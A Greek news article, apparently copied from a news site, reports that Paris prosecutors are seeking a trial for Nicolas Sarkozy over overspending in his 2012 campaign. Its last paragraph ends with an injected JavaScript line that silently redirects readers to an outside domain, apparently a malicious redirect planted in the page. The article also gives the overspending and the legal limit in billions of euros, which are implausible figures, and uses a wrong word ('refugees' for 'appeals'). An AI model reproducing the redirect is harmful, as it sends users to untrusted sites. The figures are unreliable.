Σε δικαστικές περιπέτειες ο Νικολά Σαρκοζί

0
10

 

Νέος πονοκέφαλος για τον Νικολά Σαρκοζί, καθώς η εισαγγελία του Παρισιού ζήτησε την παραπομπή του σε δίκη για μία υπόθεση παράνομης χρηματοδότησης της εκστρατείας του για την επανεκλογή του το 2012.

Σημειώνεται ότι πριν από μερικές ημέρες ανακοίνωσε την πρόθεσή του να επιστρέψει στην πολιτική σκηνή της χώρας.

Επαφίεται τώρα στους ανακριτές να αποφανθούν για το αίτημα αυτό, αλλά πρέπει να περιμένουν το λιγότερο έναν μήνα ώστε να αφήσουν χρόνο στα μέρη να καταθέσουν τυχόν πρόσφυγες.

Το χρονοδιάγραμμα αυτό είναι μια μεγάλη πρόκληση για τον Νικολά Σαρκοζί, υποψήφιο στις προκριματικές εκλογές που διοργανώνει η δεξιά αντιπολίτευση στις 20 και 27 Νοεμβρίου για να ορίσει τον υποψήφιό της στις προεδρικές εκλογές οι οποίες θα διεξαχθούν την άνοιξη του 2017.

Η εισαγγελία ζητεί την παραπομπή του Νικολά Σαρκοζί «για υπέρβαση του ορίου των προεκλογικών δαπανών» και την «αναφορά» στον λογαριασμό της προεκλογικής εκστρατείας του το 2012 «στοιχείων που εσκεμμένα υπολογίστηκαν χαμηλότερα», ανέφερε πηγή που πρόσκειται στην έρευνα.

Η έρευνα αφορά ευρύτερα ένα τεράστιο σύστημα πλαστών τιμολογίων με σκοπό να συγκαλυφθεί η υπέρβαση κατά 18,5 δισεκ. ευρώ του ορίου των επιτρεπόμενων προεκλογικών δαπανών που είχε οριστεί στα 22,5 δισεκ. ευρώ.

Στις 30 Αυγούστου, η εισαγγελία του Παρισιού είχε ζητήσει την παραπομπή σε δίκη άλλων 13 προσώπων για πλαστογραφία, κατάχρηση εμπιστοσύνης, απάτη ή συνέργεια [σε απάτη] και συνέργεια σε παράνομη χρηματοδότηση.

Ο Νικολά Σαρκοζί δεν κατηγορείται ότι είχε γνώση της απάτης. Όμως στις 16 Φεβρουαρίου απαγγέλθηκαν σε βάρος του κατηγορίες για παράνομη χρηματοδότηση της προεκλογικής εκστρατείας του, ως υπόπτου ότι προέβη σε επιπλέον δαπάνες ζητώντας να πραγματοποιηθούν και άλλες συγκεντρώσεις, ενώ ήταν σίγουρο ότι ο προϋπολογισμός του θα υπερέβαινε το όριο.

Ο πρώην πρόεδρος ήταν παραλήπτης σημειωμάτων ορκωτών λογιστών που τον είχαν προειδοποιήσει για τον κίνδυνο αυτόν. Ο ίδιος αμφισβητεί ότι υπήρξε υπέρβαση δαπανών. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here